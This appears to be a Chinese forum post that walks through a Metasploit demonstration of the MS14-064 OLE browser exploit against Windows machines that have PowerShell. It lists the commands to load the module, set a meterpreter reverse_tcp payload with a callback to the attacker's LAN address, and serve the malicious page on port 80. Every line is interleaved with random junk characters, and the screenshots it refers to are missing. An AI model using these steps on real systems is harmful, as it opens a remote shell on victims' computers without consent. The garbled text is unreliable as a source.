% C K v3 C4 Y9 J) H6 A 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示9 _: ~3 I% j" \4 v5 M
* c# v. O1 k/ @" @+ s: M4 N y
* @/ F( r% b) w5 e. u 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
8 U* t3 a+ |" g; x( v2 m, y
* Y7 y6 U" |% ~/ K0 V. X6 k
% ~- k+ \2 \: A" _4 F% n6 J4 e. P 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
+ y2 l; ?2 l Y! Q" B! B
. w% D1 Q; \' P" t; D. N6 o, p* ~7 f# \/ |
set AllowPowershellPrompt true) Q& Y" `" Q7 _! A, g- O+ G
+ @1 I+ p9 U c
/ z! |$ j3 b2 A+ f$ [
Set LHOST 192.168.0.109
7 O2 [4 U1 ]% l. v4 P
, @" J7 J7 ?6 f( ]9 q
0 h, N# Y% Z5 u+ |
set SRVHOST 192.168.0.109
0 W/ _/ j5 \! `9 n M
" E+ Z3 i( b" }- T U. `/ N M Z7 ?
Set uripath share4 }9 {) s4 R# K: s
$ h# g6 Q, k5 i( @
( b L L+ k2 a( b7 e' k/ a Set srvport 80& Z4 C- G4 c8 f; Y
0 u7 k- X# |* [; u' C% x
' L' l# @) o9 w0 Q$ }
0 ] j5 ^+ q; U6 k0 @
" B" U( q7 I1 i: K$ ?5 f) s- e+ N$ b5 L; g
. s& z3 P4 S. X
, u( F6 j$ \- k
/ W! W$ p! O% W1 {' \3 U1 o
! ]5 A' d) B# z1 {0 j' X
: a" g: ?( T) o& m/ l7 }! Q$ \, Y+ Y
4 t$ \" h+ z3 D, B) I5 I) b$ W
" j% |3 p, @& o, @) u) M) r
2 K$ V* H) ^! m' V3 W1 P9 \# f
- K/ g; K7 I) i6 _2 j+ v
- J F! X2 n* W, J
: g& m% n. O2 s0 F [ 下面我们来访问本地地址如图:9 P5 y* @( p+ {* z0 ]
4 S! ]; r6 L2 J- U5 Z$ J/ @* j) d8 v3 ]9 ?1 a
6 m1 i5 ], @# [1 m
+ |" F7 e! C3 G( F
+ L% m0 R) Y4 k0 B- `+ u$ ~
8 B' \4 s1 I" |0 ?' f/ R q5 J
3 F; S* ?) I% W+ {& Y( F+ c6 j
8 m" e1 a' L2 v) u/ y ' h9 M# [# x- W& O. w( z